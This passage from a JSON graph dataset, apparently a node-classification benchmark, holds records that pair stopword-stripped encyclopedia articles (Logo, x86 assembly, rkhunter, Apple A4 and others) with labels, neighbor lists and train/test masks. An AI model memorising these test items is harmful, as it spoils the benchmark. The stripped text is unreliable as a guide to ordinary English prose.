graphic programming first working logo turtle robot created 1969 display turtle preceded physical floor turtle modern logo changed much basic concepts first turtle first turtle tethered floor roamer radio-controlled wireless bbn paul wexelblat developed turtle named irving touch sensors could move forwards backwards rotate ding bell earliest year-long school users logo 1968-69 muzzey jr high lexington virtual physical turtles first used fifth-graders bridge school lexington 1970-71 logo most-known feature turtle derived originally robot name on-screen cursor showed output commands movement small retractable pen together producing line graphics traditionally displayed either triangle turtle icon though represented icon turtle graphics added logo language seymour papert late 1960s support papert version turtle robot simple robot controlled user workstation designed carry drawing functions assigned using small retractable pen set attached robot body practical matter use turtle geometry instead traditional model mimics actual movement logic turtle robot turtle moves commands relative position left 90 means spin left 90 degrees logo implementations particularly allow use concurrency multiple turtles support collision detection allow user redefine appearance turtle cursor essentially allowing logo turtles function sprites multiple turtles supported mswlogo well 3d graphics input com ports lpt ports also allowed mswlogo windows gui interrupts triggered via keyboard mouse events simple gif animations may also produced mswlogo version 6.5 gifsave command turtle geometry also sometimes used environments logo alternative strictly coordinate-addressed graphics system instance idea turtle graphics also useful lindenmayer system generating fractals modern derivatives logo allow thousands independently moving turtles two popular implementations massachusetts institute technology starlogo northwestern university center connected learning ccl netlogo allow exploring emergent phenomena come many experiments social studies biology physics areas netlogo widely used agent-based simulation biological social sciences although one agreed-upon standard broad consensus core aspects language march 2009 197 implementations dialects logo strengths 197 longer wide use many still active development commercial logos still widely used schools include microworlds logo imagine logo logo primary influence smalltalk programming language also main influence etoys educational programming environment language essentially logo written squeak variant smalltalk logo influenced procedure/method model agentsheets agentcubes program agents similar notion turtle logo logo provided underlying language boxer boxer developed university california berkeley mit based literacy model making easier use nontechnical people kturtle variation logo implemented qt kde environment loosely based logo another result logo influence kojo variant scala scratch educational programming language runs squeak variant smalltalk inspired logo 2015 cubetto education robotics system children 3 years older developed crowd-source funding cubetto influenced logo montessori cubetto features small cubic turtle turns 90 degrees cubetto described update button-box mit logo system tortis",
    "neighbors": [
      10752,
      11269,
      2056,
      2572,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      9795,
      8262,
      75,
      4684,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      9345,
      2691,
      1159,
      9865,
      6797,
      9877,
      5803,
      2225,
      7867,
      4799,
      9926,
      7880,
      8908,
      205,
      5837,
      219,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      9454,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      10510,
      5395,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      9006,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      8540,
      10083,
      6502,
      11625,
      8554,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      5059,
      4548,
      4550,
      11218,
      10712,
      3034,
      5604,
      3051,
      5611,
      3573,
      7670,
      11255,
      511
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6595,
    "label": 7,
    "text": "Digital_omnivore:digital omnivore digital omnivore descriptive term meant capture indiscriminate seamless modalities consumers use access world wide web cultural meme reflects popularization smartphones introduction tablets web-enabled devices allow consumers access media content several touch-points course daily digital lives mobile web users increasingly mobile devices cross-platform multimedia consumption continue re-shape digital landscape terms type media content consume consume according new 2011 survey comscore smartphones tablets driving nearly 7 digital traffic united states two-thirds growth attributed smartphones alone today half u.s. mobile population uses mobile media 19 past year 116 million people growth expected increase 36.1 americans age 13 smartphone digital omnivores global phenomenon driving 5 non-computer device internet traffic august 2011 singapore leads way 7.2 u.s united kingdom score 6.8 australia canada complete top five global markets 5.3 4.4 respectively looking deeper 6.8 non-pc web-browsing done u.s. find 64.4 comes mobile phones 28.1 tablets 7.5 devices game consoles e-readers means u.s. 4 overall web browsing comes smartphones 1.6 tablets small figures point way people beginning toggle devices across various day-parts analysis way consumers u.s. viewed news content different devices throughout day demonstrates influence devices way people consume content typical weekend morning digital omnivores access news using tablet favor computer working day return tablet use evening peaking hours 9pm midnight mobile phones used web-browsing throughout day users away personal computer increased wi-fi availability mobile broadband adoption changing way people going online today august 2011 third 37.2 u.s. digital traffic coming mobile phones occurred via wi-fi connection tablets traditionally required wi-fi connection access internet increasingly driving traffic using mobile broadband access tablets yet widely adopted already contribute nearly 2 web browsing traffic united states traffic driven almost exclusively ipad accounted 97 tablet traffic second half 2011 period ipads also began account higher share internet traffic iphones 46.8 vs. 42.6 ios device traffic u.s. tablet users largely display demographic characteristics early technology adopters younger males 49.5 age 34 average incomes 45.9 belong households earning 100,000 year point time half tablet users report used tablet least previous month activities social networking online shopping consuming news viewing videos entertainment current trend content providers optimizing sites tablets creating tablet-specific apps continues likely tablet owners interact devices even messaging set connected consumers move effortlessly online terrestrial lives may seem chaotic complex difficult navigate actually presenting opportunities never thought possible media execution buying quickly becoming new creativity levers marketers smartphone tablet connected device represents unique canvas media engagement brands strategically manage communication strategy across complementary messaging matrix best positioned create long term loyalty high engagement audiences consumers utilizing full-spectrum digital devices cultural communicators must understand patterns order develop incremental unduplicated reach across entire digital ecosystem",
    "neighbors": [
      1602,
      4194,
      6539,
      119,
      1083
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6596,
    "label": 3,
    "text": "X86_assembly_language:x86 assembly language x86 assembly language family backward-compatible assembly languages provide level compatibility way back intel 8008 introduced april 1972. x86 assembly languages used produce object code x86 class processors like assembly languages uses short mnemonics represent fundamental instructions cpu computer understand follow compilers sometimes produce assembly code intermediate step translating high level program machine code regarded programming language assembly coding machine-specific low level assembly languages typically used detailed time critical applications small real-time embedded systems operating system kernels device drivers x86 assembly instruction represented mnemonic often combined one operands translates one bytes called opcode nop instruction translates 0x90 instance hlt instruction translates 0xf4 potential opcodes documented mnemonic different processors may interpret differently making program using behave inconsistently even generate exception processors opcodes often turn code writing competitions way make code smaller faster elegant show author prowess x86 assembly language two main syntax branches intel syntax originally used documentation x86 platform syntax intel syntax dominant ms-dos windows world syntax dominant unix world since unix created bell labs summary main differences intel syntax syntax many x86 assemblers use intel syntax including nasm fasm masm tasm yasm gas supported syntaxes since version 2.10 via .intel_syntax directive x86 processors collection registers available used stores binary data collectively data address registers called general registers register special purpose addition along general registers additionally ip register points memory offset next instruction code segment points first byte instruction ip register accessed programmer directly x86 registers used using mov instructions example intel syntax mov ax 1234h copies value 1234hex 4660d register ax mov bx ax copies value ax register bx register x86 architecture real virtual 8086 mode uses process known segmentation address memory flat memory model used many environments segmentation involves composing memory address two parts segment offset segment points beginning 64 kb group addresses offset determines far beginning address desired address segmented addressing two registers required complete memory address one hold segment hold offset order translate back flat address segment value shifted four bits left equivalent multiplication 2 16 added offset form full address allows breaking 64k barrier clever choice addresses though makes programming considerably complex real mode/protected example ds contains hexadecimal number 0xdead dx contains number 0xcafe would together point memory address 0xdead 0x10 0xcafe 0xeb5ce therefore cpu address 1,048,576 bytes 1 mb real mode combining segment offset values find 20-bit address original ibm pc restricted programs 640 kb expanded memory specification used implement bank switching scheme fell use later operating systems windows used larger address ranges newer processors implemented virtual memory schemes protected mode starting intel 80286 utilized os/2 several shortcomings inability access bios inability switch back real mode without resetting processor prevented widespread usage 80286 also still limited addressing memory 16-bit segments meaning 2 bytes 64 kilobytes could accessed time access extended functionality 80286 operating system would set processor protected mode enabling 24-bit addressing thus 2 bytes memory 16 megabytes protected mode segment selector broken three parts 13-bit index table indicator bit determines whether entry gdt ldt 2-bit requested privilege level see x86 memory segmentation referring address segment offset notation segment offset used example flat address 0xeb5ce written 0xdead:0xcafe segment offset register pair ds dx special combinations segment registers general registers point important addresses intel 80386 featured three operating modes real mode protected mode virtual mode protected mode debuted 80286 extended allow 80386 address 4 gb memory new virtual 8086 mode vm86 made possible run one real mode programs protected environment largely emulated real mode though programs compatible typically result memory addressing tricks using unspecified op-codes 32-bit flat memory model 80386 extended protected mode may important feature change x86 processor family amd released x86-64 2003 helped drive large scale adoption windows 3.1 relied protected mode since windows could run many applications including dos applications using virtual memory simple multitasking x86 processors support five modes operation x86 code real mode protected mode long mode virtual 86 mode system management mode instructions available others 16-bit subset instructions available 16-bit x86 processors 8086 8088 80186 80188 80286 instructions available real mode x86 processors 16-bit protected mode 80286 onwards additional instructions relating protected mode available 80386 later 32-bit instructions including later extensions also available modes including real mode cpus v86 mode 32-bit protected mode added additional instructions provided modes manage features smm special instructions available intel i386sl i486 later cpus finally long mode amd opteron onwards 64-bit instructions registers also available instruction set similar mode memory addressing word size vary requiring different programming strategies modes x86 code executed processor runs real mode immediately power operating system kernel program must explicitly switch another mode wishes run anything real mode switching modes accomplished modifying certain bits processor control registers preparation additional setup may required switch general features modern x86 instruction set x86 architecture hardware support execution stack mechanism instructions codice_8 codice_9 codice_10 codice_11 used properly set stack pass parameters allocate space local data save restore call-return points codice_11 size instruction useful implementing space efficient fast calling conventions callee responsible reclaiming stack space occupied parameters setting stack frame hold local data recursive procedure several choices high level codice_13 instruction introduced 80386 takes procedure-nesting-depth argument well local size argument may faster explicit manipulation registers codice_14 codice_15 codice_16 whether faster slower depends particular x86-processor implementation well calling convention used compiler programmer particular program code x86 code intended run x86-processors several manufacturers different technological generations processors implies highly varying microarchitectures microcode solutions well varying gate- transistor-level design choices full range addressing modes including immediate base+offset even instructions codice_8 codice_9 makes direct usage stack integer floating point address data simple well keeping abi specifications mechanisms relatively simple compared risc architectures require explicit call stack details x86 assembly standard mathematical operations codice_19 codice_20 codice_21 codice_22 logical operators codice_23 codice_24 codice_25 codice_26 bitshift arithmetic logical codice_27/codice_28 codice_29/codice_30 rotate without carry codice_31/codice_32 codice_33/codice_34 complement bcd arithmetic instructions codice_35 codice_36 codice_37 others x86 assembly language includes instructions stack-based floating-point unit fpu fpu optional separate coprocessor 8086 80386 on-chip option 80486 series standard feature every intel x86 cpu since 80486 starting pentium fpu instructions include addition subtraction negation multiplication division remainder square roots integer truncation fraction truncation scale power two operations also include conversion instructions load store value memory following formats binary-coded decimal 32-bit integer 64-bit integer 32-bit floating-point 64-bit floating-point 80-bit floating-point upon loading value converted currently used floating-point mode x86 also includes number transcendental functions including sine cosine tangent arctangent exponentiation base 2 logarithms bases 2 10 e stack register stack register format instructions usually codice_38 codice_39 codice_40 equivalent codice_41 codice_42 one 8 stack registers codice_41 codice_44 ... codice_45 like integers first operand first source operand destination operand codice_46 codice_47 singled first swapping source operands performing subtraction division addition subtraction multiplication division store comparison instructions include instruction modes pop top stack operation complete example codice_48 performs calculation codice_49 removes codice_41 top stack thus making result codice_44 top stack codice_41 modern x86 cpus contain simd instructions largely perform operation parallel many values encoded wide simd register various instruction technologies support different operations different register sets taken complete whole mmx sse4.2 include general computations integer floating point arithmetic addition subtraction multiplication shift minimization maximization comparison division square root example codice_53 performs 4 parallel 16-bit indicated codice_54 integer adds indicated codice_55 codice_56 values codice_57 stores result codice_56 streaming simd extensions sse also includes floating point mode first value registers actually modified expanded sse2 unusual instructions added including sum absolute differences used motion estimation video compression done mpeg 16-bit multiply accumulation instruction useful software-based alpha-blending digital filtering sse since sse3 3dnow extensions include addition subtraction instructions treating paired floating point values like complex numbers instruction sets also include numerous fixed sub-word instructions shuffling inserting extracting values around within registers addition instructions moving data integer registers xmm used sse /fpu used mmx registers x86 processor also includes complex addressing modes addressing memory immediate offset register register offset scaled register without offset register optional offset another scaled register example one encode codice_59 single instruction loads 32 bits data address computed codice_60 offset codice_61 selector stores codice_62 register general x86 processors load use memory matched size register operating simd instructions also include half-load instructions x86 instruction set includes string load store move scan compare instructions codice_63 codice_64 codice_65 codice_66 codice_67 perform operation specified size codice_68 8-bit byte codice_54 16-bit word codice_70 32-bit double word increments/decrements depending df direction flag implicit address register codice_71 codice_63 codice_73 codice_64 codice_66 codice_65 codice_67 load store scan operations implicit target/source/comparison register codice_78 codice_79 codice_62 register depending size implicit segment registers used codice_61 codice_71 codice_83 codice_73 codice_85 codice_86 register used decrementing counter operation stops counter reaches zero scans comparisons inequality detected stack implemented implicitly decrementing push incrementing pop stack pointer 16-bit mode implicit stack pointer addressed ss sp 32-bit mode ss esp 64-bit mode rsp stack pointer actually points last value stored assumption size match operating mode processor i.e. 16 32 64 bits match default width codice_8/codice_9/codice_10/codice_11 instructions also included instructions codice_13 codice_92 reserve remove data top stack setting stack frame pointer codice_93/codice_1/codice_2 however direct setting addition subtraction codice_96/codice_97/codice_98 register also supported codice_13/codice_92 instructions generally unnecessary code beginning function ... functionally equivalent instructions manipulating stack include codice_101/codice_102 storing retrieving e flags register codice_103/codice_104 instructions store retrieve entire integer register state stack values simd load store assumed packed adjacent positions simd register align sequential little-endian order sse load store instructions require 16-byte alignment function properly simd instruction sets also include prefetch instructions perform load target register used cache loading sse instruction sets also include non-temporal store instructions perform stores straight memory without performing cache allocate destination already cached otherwise behave like regular store generic integer floating point simd instructions use one parameter complex address second source parameter integer instructions also accept one memory parameter destination operand x86 assembly unconditional jump operation codice_105 take immediate address register indirect address parameter note risc processors support link register short immediate displacement jumping also supported several conditional jumps including codice_106 jump zero codice_107 jump non-zero codice_108 jump greater signed codice_109 jump less signed codice_110 jump above/greater unsigned codice_111 jump below/less unsigned conditional operations based state specific bits e flags register many arithmetic logic operations set clear complement flags depending result comparison codice_112 compare codice_113 instructions set flags performed subtraction bitwise operation respectively without altering values operands also instructions codice_114 clear carry flag codice_115 complement carry flag work flags directly floating point comparisons performed via codice_116 codice_117 instructions eventually converted integer flags jump operation three different forms depending size operand short jump uses 8-bit signed operand relative offset current instruction near jump similar short jump uses 16-bit signed operand real protected mode 32-bit signed operand 32-bit protected mode far jump one uses full segment base offset value absolute address also indirect indexed forms addition simple jump operations codice_10 call subroutine codice_11 return subroutine instructions transferring control subroutine codice_10 pushes segment offset address instruction following codice_10 onto stack codice_11 pops value stack jumps effectively returning flow control part program case codice_123 segment base pushed following offset codice_124 pops offset segment base return also two similar instructions codice_125 interrupt saves current e flags register value stack performs codice_123 except instead address uses interrupt vector index table interrupt handler addresses typically interrupt handler saves cpu registers uses unless used return result operation calling program software called interrupts matching return interrupt instruction codice_127 restores flags returning soft interrupts type described used operating systems system calls also used debugging hard interrupt handlers hard interrupts triggered external hardware events must preserve register values state currently executing program unknown protected mode interrupts may set os trigger task switch automatically save registers active task using interrupt 21h output – samples use libc printf print stdout flags heavily used comparisons x86 architecture comparison made two data cpu sets relevant flag flags following conditional jump instructions used check flags branch code run e.g flags also used x86 architecture turn certain features execution modes example disable maskable interrupts use instruction flags register also directly accessed low 8 bits flag register loaded codice_128 using codice_129 instruction entire flags register also moved stack using instructions codice_101 codice_102 codice_125 including codice_133 codice_127 instruction pointer called codice_135 16-bit mode codice_136 32-bit mode codice_137 64-bit mode instruction pointer register points memory address processor next attempt execute directly accessed 16-bit 32-bit mode sequence like following written put address codice_138 codice_62 sequence instructions generates position-independent code codice_10 takes instruction-pointer-relative immediate operand describing offset bytes target instruction next instruction case 0 writing instruction pointer simple — codice_105 instruction sets instruction pointer target address example sequence like following put contents codice_62 codice_136 64-bit mode instructions reference data relative instruction pointer less need copy value instruction pointer another register",
    "neighbors": [
      132,
      1029,
      518,
      7173,
      6025,
      9739,
      9996,
      1805,
      398,
      6797,
      8590,
      9871,
      7316,
      8853,
      9366,
      6296,
      1952,
      10786,
      6821,
      2088,
      7983,
      5040,
      7601,
      9911,
      8125,
      8126,
      2623,
      6335,
      9921,
      10689,
      963,
      9028,
      9668,
      8262,
      585,
      5065,
      6730,
      2380,
      2637,
      5326,
      7501,
      8143,
      977,
      5457,
      6739,
      5844,
      6868,
      7377,
      9166,
      5080,
      10584,
      602,
      477,
      1247,
      11107,
      9194,
      5356,
      8301,
      4465,
      5234,
      499,
      372,
      5492,
      9331,
      5754,
      1915,
      7421,
      255
    ],
    "mask": "Test"
  },
  {
    "node_id": 6597,
    "label": 7,
    "text": "XCAT:xcat xcat extreme cloud administration toolkit open-source distributed computing management software developed ibm used deployment administration linux aix based clusters xcat xcat specific features designed take advantage ibm hardware including xcat achieved recognition june 2008 used ibm roadrunner set computing speed record time xcat default systems management tool ibm intelligent cluster solution xcat used lenovo",
    "neighbors": [
      6615,
      8582,
      8554,
      1515,
      5612,
      6797,
      10926,
      7983,
      10130,
      3133,
      4149,
      823,
      5273,
      3323,
      3677
    ],
    "mask": "Train"
  },
  {
    "node_id": 6598,
    "label": 9,
    "text": "CyberQuery:cyberquery cyberquery software product cyberscience corporation inc originally developed data handling analysis data general aos aos/vs minicomputers available platforms cyberquery extended major unix platforms vax/vms digital equipment corporation personal computers microsoft windows invented 1980 cyberquery declarative 4gl fourth-generation programming language early design slightly influenced ramis data access analysis languages query language ge time sharing systems cyberquery automates process accessing files tables reading records rows basic operation allows user/developer concentrate details working data within record effect working almost entirely within implicit program loop runs record compared general-purpose programming languages automation allows user/developer ignore technical details data stored concentrate information contained data cyberquery data dictionary describe datasets users wish access removes physical details file structure program user/developer original target customers cyberquery personnel departments ease use non computer specialists early design goal architecture advantage cyberquery portable reports written one database run unmodified provided underlying data logically similar differences hidden data dictionary cyberquery widely deployed industries including manufacturing finance medical retail",
    "neighbors": [
      4042
    ],
    "mask": "Test"
  },
  {
    "node_id": 6599,
    "label": 4,
    "text": "Military_Cryptanalytics:military cryptanalytics military cryptanalytics milcryp sometimes known revision lambros d. callimahos series books written william f. friedman title military cryptanalysis may also contain contributions cryptanalysts training manual national security agency military cryptanalysts published government use 1957 1977 though parts ii written 1956 1959 introduction part volume callimahos text represents extensive expansion revision scope content earlier work entitled 'military cryptanalysis part william f. friedman expansion revision necessitated considerable advancement made art since publication previous text callimahos referred parts iii–vi end first volume ... part iii deal varieties aperiodic substitution systems elementary cipher devices cryptomechanisms embrace detailed treatment cryptomathematics diagnostic tests cryptanalysis part iv treat transposition fractioning systems combined substitution-transposition systems part v treat reconstruction codes solution enciphered code systems part vi treat solution representative machine cipher systems however parts iv–vi never completed military cryptanalytics military cryptanalysis subjects foia requests including one john gilmore 1992-1993 two charles varga 2004 2016 four parts military cryptanalysis first two parts military cryptanalytics series declassified third part military cryptanalytics far released severely redacted form n't considered worth reprinting released portions repeat material first two parts 1984 nsa released copies military cryptanalytics parts ii us national archives records administration record group 457 srh-273 srh-274 respectively srh stands special research history declassified books reprinted aegean park press part military cryptanalytics consists two volumes first volume contains tutorial text second volume contains appendices part includes material uniliteral multiliteral ciphers polyalphabetic ciphers part ii includes material repeating-key bipartite systems periodic ciphers part ii volume ii includes zendian problem practical exercise traffic analysis cryptanalysis aegean park press edition wayne g. barker added programs trs-80",
    "neighbors": [
      7652,
      4007,
      7119,
      6928,
      7887,
      9615,
      3731,
      2580,
      1941
    ],
    "mask": "Test"
  },
  {
    "node_id": 6600,
    "label": 7,
    "text": "Social_cloud_computing:social cloud computing social cloud computing also peer-to-peer social cloud computing area computer science generalizes cloud computing include sharing bartering renting computing resources across peers whose owners operators verified social network reputation system expands cloud computing past confines formal commercial data centers operated cloud providers include anyone interested participating within cloud services sharing economy turn leads options greater economies scale bearing additional advantages hosting data computing services closer edge may needed peer-to-peer p2p computing networking enable decentralized cloud computing area research sometime social cloud computing intersects peer-to-peer cloud computing social computing verify peer peer owner reputation thus providing security quality service assurances users demand computing environments may constructed altered statically dynamically across peers internet based available resources verified reputation provide assurances social cloud computing highlighted potential benefit large-scale computing video gaming media streaming tenets social cloud computing famously employed berkeley open infrastructure network computing boinc making service largest computing grid world another service uses social cloud computing subutai social subutai allows peer-to-peer sharing hardware resources well files globally within small network many challenges arise moving traditional cloud infrastructure social cloud environment case traditional cloud computing availability demand essential many cloud customers social cloud computing n't provide availability guarantee p2p environment peers mobile devices may enter leave p2p network time pcs primary purpose override p2p computation time relatively successful use cases recent years require real time results computation power small subset module larger algorithm data set unlike large scale data centers company brand image people may less likely trust peers vs. large company like google amazon running sort computation sensitive information would need encrypted properly overhead encryption may reduce usefulness p2p offloading resources distributed small pieces many peers computations inherent trust must placed client regardless encryption may promised client similar availability reliability computations must consistent uniform computations offloaded client continuously interrupted mechanism detecting must place client may know computation tainted needs completely re-run p2p social computing reliable expected computation power difficult achieve speed client calculation may depend much client using end device ways overcoming may allow computations occur night specified times client resources use",
    "neighbors": [
      8640,
      4194
    ],
    "mask": "Train"
  },
  {
    "node_id": 6601,
    "label": 6,
    "text": "Iostat:iostat iostat input/output statistics computer system monitor tool used collect show operating system storage input output statistics often used identify performance issues storage devices including local disks remote disks accessed network file systems nfs also used provide information terminal tty input output also includes basic cpu information codice_1 displays output line row gives numerical data one device first column lists device name subsequent columns show various statistics device columns include average service time svc_t includes time request service queue also seek time transfer time average busy percentage b essentially proportion time device use percentage time queue empty w means proportion time requests device yet fulfilled best run codice_2 specifying time interval seconds example codice_3 order see results time otherwise output reflect values entire timespan since system last rebooted codice_2 tool available unix unix-like operating systems freebsd macos com.apple.pkg.core package linux sysstat package solaris syntax output codice_2 often differs slightly sun microsystems stated high values wait svc_t fields suggest lack overall throughput system indicating system overloaded i/o operations consistently high values kr/s kw/s w b fields also indicate possible i/o bottleneck versions solaris solaris 7 iostat give misleading information wait field multiprocessor systems iostat misinterpret one processor state waiting i/o meaning processors system wait also advisable disregard high values svc_t field disks low rates activity less 5 fsflush process force average service time synchronising data disk memory iostat display information individual volumes disk volume manager used vxstat command used show information instead contrast using linux lvm volume manager iostat display volume information individually logical volume device mapper dm device",
    "neighbors": [
      6369,
      9665,
      5000,
      1801,
      7983,
      1776,
      5492,
      5397,
      4438,
      823,
      7188,
      9882
    ],
    "mask": "None"
  },
  {
    "node_id": 6602,
    "label": 6,
    "text": "PGPDisk:pgpdisk pgp virtual disk disk encryption system allows one create virtual encrypted disk within file older versions windows nt freeware example bundled pgp v6.0.2i ckt builds pgp still available download longer maintained today pgp virtual disk available part pgp desktop product family running windows 2000/xp/vista mac os x",
    "neighbors": [
      7040,
      8640,
      2050,
      7139,
      9281,
      10631,
      4746,
      8331,
      7794,
      3572,
      5749,
      3382,
      823,
      6644,
      8283
    ],
    "mask": "Test"
  },
  {
    "node_id": 6603,
    "label": 9,
    "text": "Alice_K._Hartley:alice k. hartley alice hartley 1937-2017 american computer scientist business woman hartley worked several dialects lisp implementing multiple parts interlisp maintaining macintosh common lisp developing concepts computer science programming language design still use today hartley hobby gamer playing advising early computer games 1970s 90s hartley also antiques collector importer dealer proprietor elephant castle antiques store boston hartley spent career researcher litton industries mit bbn early employee vice president technology paladian systems engineer apple computer retiring boston massachusetts alice hartley born bridgeport connecticut december 13 1937 lowell james hartley minneapolis minnesota rachel matilda virta aura finland hartley graduated whittier junior high school bridgeport connecticut highschool valedictorian class 1955 member newtonians science club cheerleader finalist fourteenth annual westinghouse science talent search hartley accepted mit 1955 general motors scholarship graduated msc physics june 12 1959 1961 alice hartley co-wrote “ study program pattern recognition research ” george sebestyen litton systems inc earliest record research-related employment outside mit following litton industries alice hartley worked senior scientist bbn technologies bolt beranek newman inc. early 1969 “ took dan murphy ’ role bbn lisp ” added number new data types system including “ arrays strings large numbers floating point numbers ” time bbn hartley co-developed concept spaghetti stack daniel g. bobrow form stack tracing functionality interlisp brought early debugging tools programming community hartley also worked douglas w. clark implementation list-linearizing garbage collector hartley listed maintainer interlisps basic system 1974 “ interlisp reference manual ” along side warren teitelman user facilities jw goodman special arithmetic functions reads a. k. hartley basic system i.e. interpreter input/output garbage collector plus subrs i.e hand-coded machine language functions print cons prog go etc plus compiler.hartley thanked paul graham introduction ansi common lisp mentioned collaborator guy steele evolution lisp hartley resigned bbn november 7th 1984 join new ai engineering firm palladian software inc vice president technology worked 1987 palladain hartley lead development various “ artificial inteligence ” systems financial modeling trading financial markets palladian software inc hartley worked apple computers allegro common lisp tools using lisp macintosh hartley single handedly maintained macintosh common lisp 2007 open-sourced source code llgpl",
    "neighbors": [
      10981,
      6502,
      3336,
      2062,
      9969,
      4122
    ],
    "mask": "None"
  },
  {
    "node_id": 6604,
    "label": 4,
    "text": "Security_Target:security target common criteria information technology security evaluation version 3.1 part 1 called cc 3.1 cc defines security target st implementation-dependent statement security needs specific identified target evaluation toe words st defines boundary specifies details toe product evaluation process according cc st document provided vendor product st defines information assurance security functional requirements given information system product called target evaluation toe st complete rigorous description security problem terms toe description threats assumptions security objectives security functional requirements sfrs security assurance requirements sars rationales sars typically given number 1 7 called evaluation assurance level eal indicating depth rigor security evaluation usually form supporting documentation testing product meets sfrs st contains detailed implementation-specific information demonstrates product addresses security requirements may refer one protection profiles pps case st must fulfill generic security requirements given pps may define requirements 1 introduction – overview toe including key features purpose 2 conformance claims – identifies conformance claims toe evaluation 3 security problem definition describes threats assumptions operational environment objective demonstrate security problem intended addressed toe operational environment 4 security objectives – concise abstract statement intended solution problem specified security problem definition security objective must trace back least one threat osp 1 aspect security achieve purpose objective using certain mitigation measures confidentiality integrity availability user authenticity access authorisation accountability 2 confidentiality integrity availability required support applicable foundational requirements.- 5 extended components definition – extended components must consist measurable objective elements conformance demonstrated 6 security requirements defines describes sfrs cc part 2 sars cc part 3 7.toe summary specifications enables evaluators potential consumers gain general understanding toe implemented",
    "neighbors": [
      6593,
      8904,
      7979,
      1905,
      10962
    ],
    "mask": "Test"
  },
  {
    "node_id": 6605,
    "label": 1,
    "text": "Norwegian_Ship_Registers:norwegian ship registers norwegian ship registers sometimes called nis-nor norwegian government agency responsible operating norwegian international ship register norwegian ship register norwegian shipbuilding register register subordinate norwegian ministry trade industry ministry transport based bergen",
    "neighbors": [
      5147,
      6726
    ],
    "mask": "None"
  },
  {
    "node_id": 6606,
    "label": 4,
    "text": "Rkhunter:rkhunter rkhunter rootkit hunter unix-based tool scans rootkits backdoors possible local exploits comparing sha-1 hashes important files known good ones online databases searching default directories rootkits wrong permissions hidden files suspicious strings kernel modules special tests linux freebsd rkhunter notable due inclusion popular operating systems fedora debian etc tool written bourne shell allow portability run almost unix-derived systems 2003 developer michael boelen released version rootkit hunter several years development early 2006 agreed hand development development team since time eight people working set project properly work towards much-needed maintenance release project since moved sourceforge",
    "neighbors": [
      3395,
      2213,
      8582,
      107,
      6092,
      7983,
      3473,
      5492,
      5397,
      11188,
      823,
      7192,
      186,
      9791
    ],
    "mask": "Test"
  },
  {
    "node_id": 6607,
    "label": 3,
    "text": "M32R:m32r m32r 32-bit risc instruction set architecture isa developed mitsubishi electric embedded microprocessors microcontrollers isa owned renesas electronics corporation company designs fabricates m32r implementations m32r processors used embedded systems engine control units digital cameras pdas isa supported linux gnu compiler collection dropped linux kernel version 4.16",
    "neighbors": [
      7170,
      8450,
      11395,
      1798,
      3467,
      6925,
      10767,
      1170,
      1298,
      7445,
      9371,
      8861,
      3493,
      4773,
      6311,
      9638,
      682,
      4269,
      11054,
      9391,
      2224,
      4144,
      11314,
      1462,
      823,
      9911,
      11447,
      10945,
      7234,
      7235,
      6084,
      3014,
      3142,
      3911,
      9928,
      9163,
      9932,
      2517,
      9685,
      4569,
      8539,
      10851,
      7269,
      10985,
      3050,
      9964,
      5358,
      11374,
      8048,
      7281,
      8944,
      757,
      2039,
      249,
      3451,
      8700,
      1399
    ],
    "mask": "None"
  },
  {
    "node_id": 6608,
    "label": 3,
    "text": "Apple_A4:apple a4 apple a4 32-bit package package pop system-on-a-chip soc designed apple inc. manufactured samsung combines arm cortex-a8 cpu powervr gpu emphasizes power efficiency chip commercially debuted release apple ipad tablet followed shortly iphone 4 smartphone ipod touch 4th generation apple tv 2nd generation superseded apple a5 processor used ipad 2 released following year subsequently replaced apple a5x processor ipad 3rd generation software updates devices using chip ceased 2014 release ios 8 apple a4 based arm processor architecture first version released runs 1 ghz ipad contains arm cortex-a8 cpu core paired powervr sgx 535 graphics processor gpu built samsung 45 nm silicon chip fabrication process clock speed units used iphone 4 ipod touch 4th generation 800 mhz clock speed unit used apple tv released cortex-a8 core used a4 thought use performance enhancements developed chip designer intrinsity subsequently acquired apple collaboration samsung resulting core dubbed hummingbird able run far higher clock rates implementations remaining fully compatible cortex-a8 design provided arm performance improvements include additional l2 cache cortex-a8 cpu core used a4 also used samsung s5pc110a01 soc a4 processor package contain ram supports pop installation top package a4 used ipad ipod touch 4th gen apple tv 2nd gen contains two low-power 128 mb ddr sdram chips total 256 mb ram iphone 4 two chips 256 mb total 512 mb ram connected processor using arm 64-bit-wide amba 3 axi bus twice width memory buses socs used contemporary apple iphone ipod touch supporting greater need graphics bandwidth ipad apple a4 chip along original ipad announced january 27 2010 apple latest creation event june 7 2010 steve jobs publicly confirmed iphone 4 would contain a4 processor although yet known time would frequency bus width caches a4 found earlier produced ipad september 1 2010 ipod touch 4th generation apple tv 2nd generation updated include a4 processor later october 4 2011 apple refreshed ipod touch 4th generation add white model along existing black model models still contain a4 processor september 10 2013 apple a4 chip discontinued",
    "neighbors": [
      9732,
      1549,
      7697,
      4114,
      9235,
      11282,
      6165,
      11289,
      7706,
      1563,
      8222,
      1057,
      2551,
      38,
      6183,
      1576,
      4139,
      6700,
      7211,
      8237,
      9774,
      2097,
      9784,
      8250,
      8253,
      576,
      7745,
      1090,
      7747,
      2635,
      8783,
      4180,
      10838,
      10840,
      9312,
      9826,
      99,
      8806,
      3691,
      8812,
      6258,
      10357,
      6264,
      10361,
      4220,
      10365,
      2686,
      638,
      6783,
      7806,
      10878,
      644,
      4741,
      8842,
      6283,
      7824,
      146,
      147,
      659,
      2707,
      7830,
      6807,
      5784,
      7833,
      666,
      4251,
      5786,
      4258,
      7842,
      7844,
      4773,
      171,
      2735,
      3248,
      9913,
      4283,
      7869,
      8893,
      8383,
      8896,
      10945,
      6654,
      4807,
      4810,
      3790,
      1744,
      4821,
      3286,
      3293,
      4318,
      9952,
      2788,
      3301,
      6884,
      231,
